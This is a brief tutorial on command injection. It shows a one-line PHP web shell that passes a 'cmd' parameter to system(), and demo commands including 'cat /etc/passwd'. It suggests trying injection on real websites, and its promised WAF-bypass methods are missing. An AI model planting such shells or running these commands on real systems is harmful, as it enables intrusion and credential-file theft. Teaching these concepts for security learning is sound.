Command injection is a type of web vulnerability that allows attackers to execute arbitrary operating system commands on the server, where the application is running.
Command injection vulnerabilities occur when the applications make use of shell commands or scripts that execute shell commands in the background.
<?php
echo system($_GET[‘cmd’]);
?>
I have created the basic php shell as shown above with “cmd” as parameter and named it as “shell.php” , and uploaded it to the website to justify the examples for further process. In real world scenario php shell will already be present in the site. Now, everything is set-up let’s begin.
I have tried some simple commands like “id”, “whoami”, “cat /etc/passwd” to demonstrate. You can similarly do other commands also. In real world scenario if you find any website taking value of the parameter this type you can try command injection and check if its vulnerable or not.
These are some examples of the normal command injection. In my case the website doesn’t have any waf ( web application firewall ). In simple words, it doesn’t have any kind of filters present.
WAF bypass
To avoid command injection websites uses filters, you can’t simply execute the commands. So, to bypass in those cases we use some methods as shown below.
For further bypass info
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
